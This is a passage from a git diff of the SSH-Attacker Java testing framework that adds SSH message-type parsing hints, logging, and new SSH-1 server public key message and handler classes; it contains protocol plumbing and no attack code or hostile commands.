SSH_MSG_IGNORE: + LOGGER.debug("[bro] returning SSH_MSG_IGNORE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_IGNORE); + case SSH_MSG_UNIMPLEMENTED: + LOGGER.debug("[bro] returning SSH_MSG_UNIMPLEMENTED Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_UNIMPLEMENTED); + case SSH_MSG_DEBUG: + LOGGER.debug("[bro] returning SSH_MSG_DEBUG Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DEBUG); + case SSH_MSG_SERVICE_ACCEPT: + LOGGER.debug("[bro] returning SSH_MSG_SERVICE_ACCEPT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_ACCEPT); + case SSH_MSG_EXT_INFO: + LOGGER.debug("[bro] returning SSH_MSG_EXT_INFO Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_EXT_INFO); + case SSH_MSG_NEWCOMPRESS: + LOGGER.debug("[bro] returning SSH_MSG_NEWCOMPRESS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWCOMPRESS); + case SSH_MSG_KEXINIT: + LOGGER.debug("[bro] returning SSH KEX INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXINIT); + case SSH_MSG_NEWKEYS: + LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS); + case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REQUEST_OLD Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REQUEST_OLD); + case SSH_MSG_KEX_DH_GEX_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REQUEST); + case SSH_MSG_KEX_DH_GEX_GROUP: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_GROUP Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_GROUP); + case SSH_MSG_KEX_DH_GEX_INIT: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_INIT); + case SSH_MSG_KEX_DH_GEX_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REPLY); + case SSH_MSG_KEXDH_INIT: + LOGGER.debug("[bro] returning SSH_MSG_KEXDH_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXDH_INIT); + case SSH_MSG_KEXDH_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_KEXDH_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXDH_REPLY); + case SSH_MSG_HBR_INIT: + LOGGER.debug("[bro] returning SSH_MSG_HBR_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_INIT); + case SSH_MSG_HBR_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_HBR_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_REPLY); + case SSH_MSG_SERVICE_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_REQUEST); + case SSH_MSG_KEX_ECDH_INIT: + LOGGER.debug("[bro] returning SSH_MSG_KEX_ECDH_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_ECDH_INIT); + case SSH_MSG_KEX_ECDH_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_KEX_ECDH_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_ECDH_REPLY); + case SSH_MSG_ECMQV_INIT: + LOGGER.debug("[bro] returning SSH_MSG_ECMQV_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_ECMQV_INIT); + case SSH_MSG_ECMQV_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_ECMQV_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_ECMQV_REPLY); + case SSH_MSG_KEXRSA_PUBKEY: + LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_PUBKEY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXRSA_PUBKEY); + case SSH_MSG_KEXRSA_SECRET: + LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_SECRET Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXRSA_SECRET); + case SSH_MSG_KEXRSA_DONE: + LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_DONE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXRSA_DONE); + case SSH_MSG_KEXGSS_INIT: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_INIT); + case SSH_MSG_KEXGSS_CONTINUE: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_CONTINUE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_CONTINUE); + case SSH_MSG_KEXGSS_COMPLETE: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_COMPLETE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_COMPLETE); + case SSH_MSG_KEXGSS_HOSTKEY: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_HOSTKEY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_HOSTKEY); + case SSH_MSG_KEXGSS_ERROR: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_ERROR Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_ERROR); + case SSH_MSG_KEXGSS_GROUPREQ: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_GROUPREQ Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_GROUPREQ); + case SSH_MSG_KEXGSS_GROUP: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_GROUP Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_GROUP); + case SSH_MSG_USERAUTH_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_REQUEST); + case SSH_MSG_USERAUTH_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_FAILURE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_FAILURE); + case SSH_MSG_USERAUTH_SUCCESS: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_SUCCESS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_SUCCESS); + case SSH_MSG_USERAUTH_BANNER: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_BANNER Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_BANNER); + case SSH_MSG_USERAUTH_PK_OK: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_PK_OK Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_PK_OK); + case SSH_MSG_USERAUTH_PASSWD_CHANGEREQ: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_PASSWD_CHANGEREQ Hint"); + return new PacketLayerHint( + ProtocolMessageType.SSH_MSG_USERAUTH_PASSWD_CHANGEREQ); + case SSH_MSG_USERAUTH_INFO_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_INFO_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_INFO_REQUEST); + case SSH_MSG_USERAUTH_INFO_RESPONSE: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_INFO_RESPONSE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_INFO_RESPONSE); + case SSH_MSG_USERAUTH_GSSAPI_RESPONSE: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_RESPONSE Hint"); + return new PacketLayerHint( + ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_RESPONSE); + case SSH_MSG_USERAUTH_GSSAPI_TOKEN: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_TOKEN Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_TOKEN); + case SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE Hint"); + return new PacketLayerHint( + ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE); + case SSH_MSG_USERAUTH_GSSAPI_ERROR: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_ERROR Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_ERROR); + case SSH_MSG_USERAUTH_GSSAPI_ERRTOK: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_ERRTOK Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_ERRTOK); + case SSH_MSG_USERAUTH_GSSAPI_MIC: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_MIC Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_MIC); + case SSH_MSG_GLOBAL_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_GLOBAL_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_GLOBAL_REQUEST); + case SSH_MSG_REQUEST_SUCCESS: + LOGGER.debug("[bro] returning SSH_MSG_REQUEST_SUCCESS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_REQUEST_SUCCESS); + case SSH_MSG_REQUEST_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_REQUEST_FAILURE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_REQUEST_FAILURE); + case SSH_MSG_CHANNEL_OPEN: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN); + case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_CONFIRMATION Hint"); + return new PacketLayerHint( + ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_CONFIRMATION); + case SSH_MSG_CHANNEL_OPEN_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_FAILURE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_FAILURE); + case SSH_MSG_CHANNEL_WINDOW_ADJUST: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_WINDOW_ADJUST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_WINDOW_ADJUST); + case SSH_MSG_CHANNEL_DATA: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_DATA Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_DATA); + case SSH_MSG_CHANNEL_EXTENDED_DATA: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_EXTENDED_DATA Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_EXTENDED_DATA); + case SSH_MSG_CHANNEL_EOF: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_EOF Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_EOF); + case SSH_MSG_CHANNEL_CLOSE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_CLOSE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_CLOSE); + case SSH_MSG_CHANNEL_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_REQUEST); + case SSH_MSG_CHANNEL_SUCCESS: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_SUCCESS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_SUCCESS); + case SSH_MSG_CHANNEL_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_FAILURE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_FAILURE); + case UNKNOWN: + LOGGER.debug("[bro] returning UNKNOWN Hint"); + return new PacketLayerHint(ProtocolMessageType.UNKNOWN); + default: + LOGGER.debug( + "[bro] cannot identifie {} as {} - returningn null", + raw[1], + MessageIdConstant.fromId( + packet.getCleanProtocolMessageBytes().getValue()[0], + context.getContext())); + return null; + } + } else { + LOGGER.warn("Unkonwn or Unsupported Layer-Type"); + throw new RuntimeException(); + } + /* MessageIdConstant id = MessageIdConstant.fromId( - packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext()); - LOGGER.debug( - "[bro] Identifier: {} and constant {}", - packet.getCleanProtocolMessageBytes().getValue()[0], - id); + packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext());*/ + /* LOGGER.debug( + "[bro] Identifier: {} and constant {}", + packet.getCleanProtocolMessageBytes().getValue()[0], + id);*/ - switch (MessageIdConstant.fromId( - packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext())) { + /*switch (MessageIdConstant.fromId( + packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext()))*/ + + /*switch (MessageIdConstantSSH1.fromId(id,context.getContext())) { case SSH_MSG_DISCONNECT: LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DISCONNECT); @@ -467,6 +734,6 @@ public LayerProcessingHint parseMessageId(AbstractPacket packet, SshContext cont packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext())); return null; - } + }*/ } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java index 5057fa569..5675fdfe5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java @@ -9,9 +9,13 @@ import de.rub.nds.sshattacker.core.constants.SshMessageConstants; import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public abstract class SshMessageParser> extends ProtocolMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + /*public SshMessageParser(byte[] array) { super(array); } @@ -32,6 +36,7 @@ protected final void parseProtocolMessageContents(T message) { private void parseMessageID(T message) { message.setMessageId(parseByteField(SshMessageConstants.MESSAGE_ID_LENGTH)); + LOGGER.debug("Parsing MessageID {}", message.getMessageId()); } protected abstract void parseMessageSpecificContents(T message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessagePreparator.java index 6c53884a5..1ee830fc5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessagePreparator.java @@ -7,7 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.common; +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,11 +20,16 @@ public abstract class SshMessagePreparator> private static final Logger LOGGER = LogManager.getLogger(); - private final MessageIdConstant messageId; + private final ModifiableByte messageId; public SshMessagePreparator(Chooser chooser, T message, MessageIdConstant messageId) { super(chooser, message); - this.messageId = messageId; + this.messageId = ModifiableVariableFactory.safelySetValue(null, messageId.getId()); + } + + public SshMessagePreparator(Chooser chooser, T message, MessageIdConstantSSH1 messageId) { + super(chooser, message); + this.messageId = ModifiableVariableFactory.safelySetValue(null, messageId.getId()); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java new file mode 100644 index 000000000..af2ede213 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java @@ -0,0 +1,121 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ServerPublicKeyMessageHandler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ServerPublicKeyMessageHandler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(ServerPublicKeyMessage message) { + // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); + setRemoteValues(message); + sshContext.getChooser().getHybridKeyExchange().combineSharedSecrets(); + sshContext.setSharedSecret( + sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); + sshContext + .getExchangeHashInputHolder() + .setSharedSecret(sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); + KeyExchangeUtil.computeExchangeHash(sshContext); + /* KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message);*/ + KeyExchangeUtil.setSessionId(sshContext); + KeyExchangeUtil.generateKeySet(sshContext); + } + + private void setRemoteValues(ServerPublicKeyMessage message) { + sshContext + .getChooser() + .getHybridKeyExchange() + .getKeyAgreement() + .setRemotePublicKey(message.getPublicKey().getValue()); + LOGGER.info( + "RemoteKey Agreement = " + + ArrayConverter.bytesToRawHexString(message.getPublicKey().getValue())); + sshContext + .getChooser() + .getHybridKeyExchange() + .getKeyEncapsulation() + .setEncryptedSharedSecret(message.getCombinedKeyShare().getValue()); + LOGGER.info( + "Ciphertext Encapsulation = " + + ArrayConverter.bytesToRawHexString( + message.getCombinedKeyShare().getValue())); + byte[] combined; + switch (sshContext.getChooser().getHybridKeyExchange().getCombiner()) { + case CLASSICAL_CONCATENATE_POSTQUANTUM: + combined = + KeyExchangeUtil.concatenateHybridKeys( + message.getPublicKey().getValue(), + message.getCombinedKeyShare().getValue()); + sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); + break; + case POSTQUANTUM_CONCATENATE_CLASSICAL: + combined = + KeyExchangeUtil.concatenateHybridKeys( + message.getCombinedKeyShare().getValue(), + message.getPublicKey().getValue()); + sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); + break; + default: + LOGGER.warn( + "Combiner" + + sshContext.getChooser().getHybridKeyExchange().getCombiner() + + " is not supported."); + break; + } + } + + /*@Override + public SshMessageParser getParser(byte[] array) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageParser( + array, kex.getCombiner(), kex.getPkAgreementLength(), kex.getCiphertextLength()); + } + + @Override + public SshMessageParser getParser( + byte[] array, int startPosition) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageParser( + array, + startPosition, + kex.getCombiner(), + kex.getPkAgreementLength(), + kex.getCiphertextLength()); + } + + @Override + public SshMessagePreparator getPreparator() { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessagePreparator( + context.getChooser(), message, kex.getCombiner()); + } + + @Override + public SshMessageSerializer getSerializer() { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageSerializer(message, kex.getCombiner()); + }*/ +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java new file mode 100644 index 000000000..d91fb9c05 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java @@ -0,0 +1,308 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ServerPublicKeyMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ServerPublicKeyMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ServerPublicKeyMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ServerPublicKeyMessageSerializer; +import java.io.InputStream; + +public class ServerPublicKeyMessage extends SshMessage { + + public ModifiableByteArray getAntiSpoofingCookie() { + return antiSpoofingCookie; + } + + public void setAntiSpoofingCookie(ModifiableByteArray antiSpoofingCookie) { + this.antiSpoofingCookie = antiSpoofingCookie; + } + + public void setAntiSpoofingCookie(byte[] antiSpoofingCookie) { + this.antiSpoofingCookie = + ModifiableVariableFactory.safelySetValue( + this.antiSpoofingCookie, antiSpoofingCookie); + } + + private SshPublicKey hostKey; + + public void setHostKey(SshPublicKey hostKey) { + this.hostKey = hostKey; + } + + public SshPublicKey getServerKey() { + return serverKey; + } + + public void setServerKey(SshPublicKey serverKey) { + this.serverKey = serverKey; + // this.serverPublicExponent = serverKey.getPublicKey().getPublicExponent().byteValue(); + // //toModifiableByteArry.... + // this.serverPublicModulus = serverKey.getPublicKey().getModulus().byteValue(); + // //toModifiableByteArry... + } + + private SshPublicKey serverKey; + + // *SSHV1*// + private ModifiableByteArray antiSpoofingCookie; + private ModifiableInteger serverKeyByteLength; + + public ModifiableByteArray getServerPublicExponent() { + return serverPublicExponent; + } + + public void setServerPublicExponent(ModifiableByteArray serverPublicExponent) { + this.serverPublicExponent = serverPublicExponent; + } + + public void setServerPublicExponent(byte[] serverPublicExponent) { + this.serverPublicExponent = + ModifiableVariableFactory.safelySetValue( + this.serverPublicExponent, serverPublicExponent); + } + + public ModifiableByteArray getServerPublicModulus() { + return serverPublicModulus; + } + + public void setServerPublicModulus(ModifiableByteArray serverPublicModulus) { + this.serverPublicModulus = serverPublicModulus; + } + + public void setServerPublicModulus(byte[] serverPublicModulus) { + this.serverPublicModulus = + ModifiableVariableFactory.safelySetValue( + this.serverPublicModulus, serverPublicModulus); + } + + private ModifiableByteArray serverPublicExponent; + private ModifiableByteArray serverPublicModulus; + + public ModifiableInteger getServerKeyByteLength() { + return serverKeyByteLength; + } + + public void setServerKeyByteLength(ModifiableInteger serverKeyByteLength) { + this.serverKeyByteLength = serverKeyByteLength; + } + + public void setServerKeyByteLenght(int serverKeyBits) { + this.serverKeyByteLength = + ModifiableVariableFactory.safelySetValue(this.serverKeyByteLength, serverKeyBits); + } + + public ModifiableInteger getHostKeyByteLenght() { + return hostKeyByteLenght; + } + + public void setHostKeyByteLenght(ModifiableInteger hostKeyByteLenght) { + this.hostKeyByteLenght = hostKeyByteLenght; + } + + public void setHostKeyByteLenght(int hostKeyBits) { + this.hostKeyByteLenght = + ModifiableVariableFactory.safelySetValue(this.hostKeyByteLenght, hostKeyBits); + } + + private ModifiableInteger hostKeyByteLenght; + + public ModifiableByteArray getHostPublicExponent() { + return hostPublicExponent; + } + + public void setHostPublicExponent(ModifiableByteArray hostPublicExponent) { + this.hostPublicExponent = hostPublicExponent; + } + + public void setHostPublicExponent(byte[] hostPublicExponent) { + this.hostPublicExponent = + ModifiableVariableFactory.safelySetValue( + this.hostPublicExponent, hostPublicExponent); + } + + public ModifiableByteArray getHostPublicModulus() { + return hostPublicModulus; + } + + public void setHostPublicModulus(ModifiableByteArray hostPublicModulus) { + this.hostPublicModulus = hostPublicModulus; + } + + public void setHostPublicModulus(byte[] publicModulus) { + this.hostPublicModulus = + ModifiableVariableFactory.safelySetValue(this.hostPublicModulus, publicModulus); + } + + private ModifiableByteArray hostPublicExponent; + private ModifiableByteArray hostPublicModulus; + private ModifiableInteger protocolFlags; + private ModifiableInteger cipherMask; + private ModifiableInteger authMask; + // *SSHV1*// + + public ModifiableByteArray getHostKeyBytes() { + return hostKeyBytes; + } + + public void setHostKeyBytes(ModifiableByteArray hostKeyBytes) { + this.hostKeyBytes = hostKeyBytes; + } + + public void setHostKeyBytes(byte[] hostKeyBytes) { + this.hostKeyBytes = + ModifiableVariableFactory.safelySetValue(this.hostKeyBytes, hostKeyBytes); + } + + private ModifiableByteArray hostKeyBytes; + + public ModifiableByteArray getServerKeyBytes() { + return serverKeyBytes; + } + + public void setServerKeyBytes(ModifiableByteArray serverKeyBytes) { + this.serverKeyBytes = serverKeyBytes; + } + + public void setServerKeyBytes(byte[] serverKeyBytes) { + this.serverKeyBytes = + ModifiableVariableFactory.safelySetValue(this.serverKeyBytes, serverKeyBytes); + ; + } + + private ModifiableByteArray serverKeyBytes; + + private ModifiableInteger publicKeyLength; + private ModifiableByteArray publicKey; + + private ModifiableInteger combinedKeyShareLength; + private ModifiableByteArray combinedKeyShare; + + private ModifiableInteger signatureLength; + private ModifiableByteArray signature; + + public ModifiableInteger getPublicKeyLength() { + return publicKeyLength; + } + + public void setPublicKeyLength(ModifiableInteger publicKeyLength) { + this.publicKeyLength = publicKeyLength; + } + + public void setPublicKeyLength(int publicKeyLength) { + this.publicKeyLength = + ModifiableVariableFactory.safelySetValue(this.publicKeyLength, publicKeyLength); + } + + public ModifiableByteArray getPublicKey() { + return publicKey; + } + + public void setPublicKey(byte[] publicKey) { + setPublicKey(publicKey, false); + } + + public void setPublicKey(ModifiableByteArray publicKey, boolean adjustLengthField) { + this.publicKey = publicKey; + if (adjustLengthField) { + setPublicKeyLength(this.publicKey.getValue().length); + } + } + + public void setPublicKey(byte[] publicKey, boolean adjustLengthField) { + this.publicKey = ModifiableVariableFactory.safelySetValue(this.publicKey, publicKey); + if (adjustLengthField) { + setPublicKeyLength(this.publicKey.getValue().length); + } + } + + public ModifiableInteger getCombinedKeyShareLength() { + return combinedKeyShareLength; + } + + public void setCombinedKeyShareLength(ModifiableInteger combinedKeyShareLength) { + this.combinedKeyShareLength = combinedKeyShareLength; + } + + public void setCiphertextLength(int ciphertextLength) { + this.combinedKeyShareLength = + ModifiableVariableFactory.safelySetValue( + this.combinedKeyShareLength, ciphertextLength); + } + + public ModifiableByteArray getCombinedKeyShare() { + return combinedKeyShare; + } + + public void setCombinedKeyShare(byte[] combinedKeyShare) { + setCiphertext(combinedKeyShare, false); + } + + public void setCiphertext(ModifiableByteArray ciphertext, boolean adjustLengthField) { + this.combinedKeyShare = ciphertext; + if (adjustLengthField) { + setCiphertextLength(this.combinedKeyShare.getValue().length); + } + } + + public void setCiphertext(byte[] ciphertext, boolean adjustLengthField) { + this.combinedKeyShare = + ModifiableVariableFactory.safelySetValue(this.combinedKeyShare, ciphertext); + if (adjustLengthField) { + setCiphertextLength(this.combinedKeyShare.getValue().length); + } + } + + @Override + public ServerPublicKeyMessageHandler getHandler(SshContext context) { + return new ServerPublicKeyMessageHandler(context); + } + + /*@Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageParser( + array, kex.getCombiner(), 